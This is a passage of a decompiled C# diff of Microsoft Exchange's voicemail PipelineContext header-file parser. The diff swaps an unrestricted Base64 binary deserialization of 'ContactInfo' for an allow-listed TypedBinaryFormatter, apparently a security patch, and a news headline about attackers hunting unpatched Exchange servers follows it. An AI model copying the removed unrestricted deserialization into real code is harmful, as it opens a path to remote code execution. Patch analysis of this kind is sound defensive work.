this.helper.TenantGuid;\n \t\t\t}\n \t\t}\n \n \t\tinternal int ProcessedCount\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.processedCount;\n \t\t\t}\n \t\t}\n \n \t\tinternal ExDateTime SentTime\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.sentTime;\n \t\t\t}\n \t\t\tset\n \t\t\t{\n \t\t\t\tthis.sentTime = value;\n \t\t\t}\n \t\t}\n \n \t\tinternal CultureInfo CultureInfo\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.cultureInfo;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string HeaderFileName\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\tif (string.IsNullOrEmpty(this.headerFileName))\n \t\t\t\t{\n \t\t\t\t\tGuid guid = Guid.NewGuid();\n \t\t\t\t\tthis.headerFileName = Path.Combine(Utils.VoiceMailFilePath, guid.ToString() + \".txt\");\n \t\t\t\t}\n \t\t\t\treturn this.headerFileName;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.headerFileName = value;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string CallerAddress\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.CallerAddress;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.helper.CallerAddress = value;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string CallerIdDisplayName\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.CallerIdDisplayName;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.helper.CallerIdDisplayName = value;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string MessageType\n \t\t{\n \t\t\tinternal get\n \t\t\t{\n \t\t\t\treturn this.messageType;\n \t\t\t}\n \t\t\tset\n \t\t\t{\n \t\t\t\tthis.messageType = value;\n \t\t\t}\n \t\t}\n \n \t\tpublic virtual void PrepareUnProtectedMessage()\n \t\t{\n \t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, this.GetHashCode(), \"PipelineContext:PrepareUnProtectedMessage.\", Array.Empty<object>());\n \t\t\tusing (DisposeGuard disposeGuard = default(DisposeGuard))\n \t\t\t{\n \t\t\t\tthis.messageToSubmit = MessageItem.CreateInMemory(StoreObjectSchema.ContentConversionProperties);\n \t\t\t\tdisposeGuard.Add<MessageItem>(this.messageToSubmit);\n \t\t\t\tthis.SetMessageProperties();\n \t\t\t\tdisposeGuard.Success();\n \t\t\t}\n \t\t}\n \n \t\tpublic virtual void PrepareProtectedMessage()\n \t\t{\n \t\t\tthrow new InvalidOperationException();\n \t\t}\n \n \t\tpublic virtual void PrepareNDRForFailureToGenerateProtectedMessage()\n \t\t{\n \t\t\tthrow new InvalidOperationException();\n \t\t}\n \n \t\tpublic virtual PipelineDispatcher.WIThrottleData GetThrottlingData()\n \t\t{\n \t\t\treturn new PipelineDispatcher.WIThrottleData\n \t\t\t{\n \t\t\t\tKey = this.GetMailboxServerId(),\n \t\t\t\tRecipientId = this.GetRecipientIdForThrottling(),\n \t\t\t\tWorkItemType = PipelineDispatcher.ThrottledWorkItemType.NonCDRWorkItem\n \t\t\t};\n \t\t}\n \n \t\tpublic virtual void PostCompletion()\n \t\t{\n \t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"PipelineContext - Deleting header file '{0}'\", new object[]\n \t\t\t{\n \t\t\t\tthis.headerFileName\n \t\t\t});\n \t\t\tUtil.TryDeleteFile(this.headerFileName);\n \t\t}\n \n \t\tinternal static PipelineContext FromHeaderFile(string headerFile)\n \t\t{\n \t\t\tPipelineContext pipelineContext = null;\n \t\t\tPipelineContext result;\n \t\t\ttry\n \t\t\t{\n \t\t\t\tContactInfo contactInfo = null;\n \t\t\t\tstring text = null;\n \t\t\t\tint num = 0;\n \t\t\t\tExDateTime exDateTime = default(ExDateTime);\n \t\t\t\tstring text2 = null;\n \t\t\t\tSubmissionHelper submissionHelper = new SubmissionHelper();\n \t\t\t\tuint num2;\n \t\t\t\tusing (StreamReader streamReader = File.OpenText(headerFile))\n \t\t\t\t{\n \t\t\t\t\tstring text3;\n \t\t\t\t\twhile ((text3 = streamReader.ReadLine()) != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tstring[] array = text3.Split(\" : \".ToCharArray(), 2, StringSplitOptions.RemoveEmptyEntries);\n \t\t\t\t\t\tif (array != null && array.Length == 2)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tstring text4 = array[0];\n \t\t\t\t\t\t\tnum2 = <PrivateImplementationDetails>.ComputeStringHash(text4);\n \t\t\t\t\t\t\tif (num2 <= 872212143U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num2 <= 134404218U)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tif (num2 != 77294025U)\n \t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\tif (num2 != 111122938U)\n \t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tif (num2 == 134404218U)\n +\t\t\t\t\t\t\t\t\t\t\tif (num2 != 134404218U)\n \t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\tif (text4 == \"ProcessedCount\")\n -\t\t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\t\tnum = Convert.ToInt32(array[1], CultureInfo.InvariantCulture) + 1;\n -\t\t\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"ProcessedCount\"))\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tnum = Convert.ToInt32(array[1], CultureInfo.InvariantCulture) + 1;\n +\t\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\t\telse if (text4 == \"RecipientObjectGuid\")\n +\t\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"RecipientObjectGuid\"))\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.RecipientObjectGuid = new Guid(array[1]);\n \t\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\telse if (text4 == \"CallerNAme\")\n +\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerNAme\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerName = array[1];\n \t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\telse if (num2 <= 507978139U)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tif (num2 != 152414519U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (num2 == 507978139U)\n +\t\t\t\t\t\t\t\t\t\tif (num2 != 507978139U)\n \t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tif (text4 == \"RecipientName\")\n -\t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.RecipientName = array[1];\n -\t\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"RecipientName\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tsubmissionHelper.RecipientName = array[1];\n +\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\telse if (text4 == \"ContactInfo\")\n +\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tcontactInfo = (CommonUtil.Base64Deserialize(array[1]) as ContactInfo);\n -\t\t\t\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"ContactInfo\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tException ex = null;\n +\t\t\t\t\t\t\t\t\t\ttry\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\ttry\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tusing (MemoryStream memoryStream = new MemoryStream(Convert.FromBase64String(array[1])))\n +\t\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\t\tcontactInfo = (ContactInfo)TypedBinaryFormatter.DeserializeObject(memoryStream, PipelineContext.contactInfoDeserializationAllowList, null, true);\n +\t\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcatch (ArgumentNullException ex)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcatch (SerializationException ex)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcatch (Exception ex)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tfinally\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tif (ex != null)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Failed to get contactInfo from header file {0} with Error={1}\", new object[]\n +\t\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\t\theaderFile,\n +\t\t\t\t\t\t\t\t\t\t\t\t\tex\n +\t\t\t\t\t\t\t\t\t\t\t\t});\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\telse if (num2 != 707084238U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (num2 == 872212143U)\n +\t\t\t\t\t\t\t\t\tif (num2 != 872212143U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (text4 == \"CallerId\")\n -\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerId = Microsoft.Exchange.UM.UMCommon.PhoneNumber.Parse(array[1]);\n -\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerId\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerId = Microsoft.Exchange.UM.UMCommon.PhoneNumber.Parse(array[1]);\n +\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\telse if (text4 == \"SentTime\")\n +\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"SentTime\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\tDateTime dateTime = Convert.ToDateTime(array[1], CultureInfo.InvariantCulture);\n \t\t\t\t\t\t\t\t\texDateTime = new ExDateTime(ExTimeZone.CurrentTimeZone, dateTime);\n \t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t\telse if (num2 <= 2593661420U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num2 <= 1526417836U)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tif (num2 != 978885386U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (num2 == 1526417836U)\n +\t\t\t\t\t\t\t\t\t\tif (num2 != 1526417836U)\n \t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tif (text4 == \"MessageType\")\n -\t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\ttext = array[1];\n -\t\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"MessageType\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\ttext = array[1];\n +\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\telse if (text4 == \"CallerAddress\")\n +\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerAddress\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerAddress = array[1];\n \t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\telse if (num2 != 1850847732U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (num2 == 2593661420U)\n +\t\t\t\t\t\t\t\t\tif (num2 != 2593661420U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (text4 == \"CallId\")\n -\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallId = array[1];\n -\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallId\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tsubmissionHelper.CallId = array[1];\n +\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\telse if (text4 == \"CallerIdDisplayName\")\n +\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerIdDisplayName\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\tsubmissionHelper.CallerIdDisplayName = array[1];\n \t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t\telse if (num2 <= 3342616108U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num2 != 2975106116U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (num2 == 3342616108U)\n +\t\t\t\t\t\t\t\t\tif (num2 != 3342616108U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (text4 == \"TenantGuid\")\n -\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.TenantGuid = new Guid(array[1]);\n -\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"TenantGuid\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tsubmissionHelper.TenantGuid = new Guid(array[1]);\n +\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\telse if (text4 == \"SenderAddress\")\n +\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"SenderAddress\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\tstring text5 = array[1];\n \t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t\telse if (num2 != 3581765001U)\n \t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\tif (num2 == 4186841001U)\n +\t\t\t\t\t\t\t\tif (num2 != 4186841001U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (text4 == \"CultureInfo\")\n -\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tsubmissionHelper.CultureInfo = array[1];\n -\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\tif (!(text4 == \"CultureInfo\"))\n +\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\tsubmissionHelper.CultureInfo = array[1];\n +\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\telse if (text4 == \"MessageID\")\n +\t\t\t\t\t\t\telse if (!(text4 == \"MessageID\"))\n \t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\ttext2 = array[1];\n -\t\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\ttext2 = array[1];\n +\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\tIL_409:\n \t\t\t\t\t\t\tsubmissionHelper.CustomHeaders[array[0]] = array[1];\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\tnum2 = <PrivateImplementationDetails>.ComputeStringHash(text);\n \t\t\t\tif (num2 <= 894870128U)\n \t\t\t\t{\n \t\t\t\t\tif (num2 <= 360985808U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 != 356120169U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (num2 == 360985808U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (text == \"Fax\")\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tpipelineContext = new FaxPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t\telse if (text == \"IncomingCallLog\")\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tpipelineContext = new IncomingCallLogPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (num2 != 438908515U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 != 466919760U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (num2 == 894870128U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (text == \"CDR\")\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tpipelineContext = CDRPipelineContext.Deserialize((string)submissionHelper.CustomHeaders[\"CDRData\"]);\n -\t\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t\telse if (text == \"MissedCall\")\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tpipelineContext = new MissedCallPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (text == \"OCSNotification\")\n \t\t\t\t\t{\n \t\t\t\t\t\tpipelineContext = OCSPipelineContext.Deserialize((string)submissionHelper.CustomHeaders[\"OCSNotificationData\"]);\n \t\t\t\t\t\ttext2 = pipelineContext.messageID;\n \t\t\t\t\t\texDateTime = pipelineContext.sentTime;\n -\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\telse if (num2 <= 1086454342U)\n \t\t\t\t{\n \t\t\t\t\tif (num2 != 995233564U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 == 1086454342U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (text == \"XSOVoiceMail\")\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tpipelineContext = new XSOVoiceMessagePipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (text == \"PartnerTranscriptionRequest\")\n \t\t\t\t\t{\n \t\t\t\t\t\tpipelineContext = new PartnerTranscriptionRequestPipelineContext(submissionHelper);\n -\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\telse if (num2 != 1356218075U)\n \t\t\t\t{\n \t\t\t\t\tif (num2 != 2525024257U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 == 3974407582U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (text == \"SMTPVoiceMail\")\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num < PipelineWorkItem.ProcessedCountMax - 1)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tpipelineContext = new VoiceMessagePipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\tpipelineContext = new MissedCallPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (text == \"HealthCheck\")\n \t\t\t\t\t{\n \t\t\t\t\t\tpipelineContext = new HealthCheckPipelineContext(Path.GetFileNameWithoutExtension(headerFile));\n -\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\telse if (text == \"OutgoingCallLog\")\n \t\t\t\t{\n \t\t\t\t\tpipelineContext = new OutgoingCallLogPipelineContext(submissionHelper);\n -\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\tgoto IL_694;\n \t\t\t\t}\n \t\t\t\tthrow new HeaderFileArgumentInvalidException(string.Format(CultureInfo.InvariantCulture, \"{0}: {1}\", \"MessageType\", text));\n -\t\t\t\tIL_62E:\n +\t\t\t\tIL_694:\n \t\t\t\tif (text2 == null)\n \t\t\t\t{\n \t\t\t\t\ttext2 = Guid.NewGuid().ToString();\n \t\t\t\t\texDateTime = ExDateTime.Now;\n \t\t\t\t}\n \t\t\t\tpipelineContext.HeaderFileName = headerFile;\n \t\t\t\tpipelineContext.processedCount = num;\n \t\t\t\tif (contactInfo != null)\n \t\t\t\t{\n \t\t\t\t\tIUMResolveCaller iumresolveCaller = pipelineContext as IUMResolveCaller;\n \t\t\t\t\tif (iumresolveCaller != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tiumresolveCaller.ContactInfo = contactInfo;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\tpipelineContext.sentTime = exDateTime;\n \t\t\t\tpipelineContext.messageID = text2;\n \t\t\t\tpipelineContext.WriteHeaderFile(headerFile);\n \t\t\t\tresult = pipelineContext;\n \t\t\t}\n -\t\t\tcatch (IOException ex)\n +\t\t\tcatch (IOException ex2)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Failed to parse the header file {0} because its not closed by thread creating the file. Error={1}\", new object[]\n \t\t\t\t{\n \t\t\t\t\theaderFile,\n -\t\t\t\t\tex\n +\t\t\t\t\tex2\n \t\t\t\t});\n \t\t\t\tif (pipelineContext != null)\n \t\t\t\t{\n \t\t\t\t\tpipelineContext.Dispose();\n \t\t\t\t\tpipelineContext = null;\n \t\t\t\t}\n \t\t\t\tresult = null;\n \t\t\t}\n -\t\t\tcatch (InvalidObjectGuidException ex2)\n +\t\t\tcatch (InvalidObjectGuidException ex3)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceWarning(ExTraceGlobals.VoiceMailTracer, 0, \"Couldn'
Hackers Actively Searching for Unpatched Microsoft Exchange Servers
